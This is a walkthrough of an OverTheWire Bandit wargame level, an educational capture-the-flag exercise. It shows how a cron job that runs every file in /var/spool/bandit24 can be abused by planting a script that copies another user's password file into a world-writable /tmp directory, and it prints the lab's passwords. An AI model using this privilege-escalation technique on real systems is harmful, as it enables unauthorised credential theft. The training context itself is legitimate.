Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
Solution
Password: jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
1 |
$ ssh [email protected] -p 2220 |
Again, let’s check out cron.
1 2 3 4 5 |
[email protected]:~$ ls /etc/cron.d/ cronjob_bandit22 cronjob_bandit23 cronjob_bandit24 popularity-contest [email protected]:~$ cat /etc/cron.d/cronjob_bandit24 @reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null * * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null |
Nothing too surprising. Yet another script.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
[email protected]:~$ cat /usr/bin/cronjob_bandit24.sh #!/bin/bash myname=$(whoami) cd /var/spool/$myname echo "Executing and deleting all scripts in /var/spool/$myname:" for i in * .*; do if [ "$i" != "." -a "$i" != ".." ]; then echo "Handling $i" timeout -s 9 60 ./$i rm -f ./$i fi done |
Let’s examine this script.
- Set a variable called myname based on the user who runs it (in this case, it’ll be bandit24)
- Change to a directory (/var/spool/bandit24)
- Output some debugging information
- Loop through all files in the directory
- Check if the file is the special file . or ..
- If not, execute the file for 60 seconds before killing it
- Delete the file
So we can run commands as bandit24 if we put a shell script in /var/spool/bandit24. We know that in this wargame a user can read their own password file. So we can have our script read the file for us.
cronjobs redirect standard output, so we should save this information to a file. I doubt that bandit24 can write to bandit23‘s home directory, so let’s create a directory in /tmp.
1 2 |
[email protected]:~$ mkdir /tmp/output_dir [email protected]:~$ cd /tmp/output_dir |
Now we need to write a script to output a file to that directory.
Here’s a simple script to do that.
1 2 |
#!/bin/bash cat /etc/bandit_pass/bandit24 > /tmp/output_dir/password |
I’m gonna use vi to create get_pass.sh.
1 |
[email protected]:/tmp/output_dir$ vi get_pass.sh |
Press i (insert) to activate writing mode. You can now copy + paste the script into the file. Press Esc to exit writing mode, then Shift + zz to save and exit.
1 2 3 |
[email protected]:/tmp/output_dir$ cat get_pass.sh #!/bin/bash cat /etc/bandit_pass/bandit24 > /tmp/output_dir/password |
Let’s make it executable by all users..
1 |
[email protected]:/tmp/output_dir$ chmod a+x get_pass.sh |
We also need to let bandit24 (let’s make it all users) be able to write to our directory.
1 |
[email protected]:/tmp/output_dir$ chmod a+w . |
Now, let’s copy it to the directory the cronjob executes from.
1 |
[email protected]:/tmp/output_dir$ cp get_pass.sh /var/spool/bandit24/ |
When the next minute ticks over, we should get a file called password in our directory.
1 2 3 4 |
[email protected]:/tmp/output_dir$ ls get_pass.sh password [email protected]:/tmp/output_dir$ cat password UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ |
Got’em.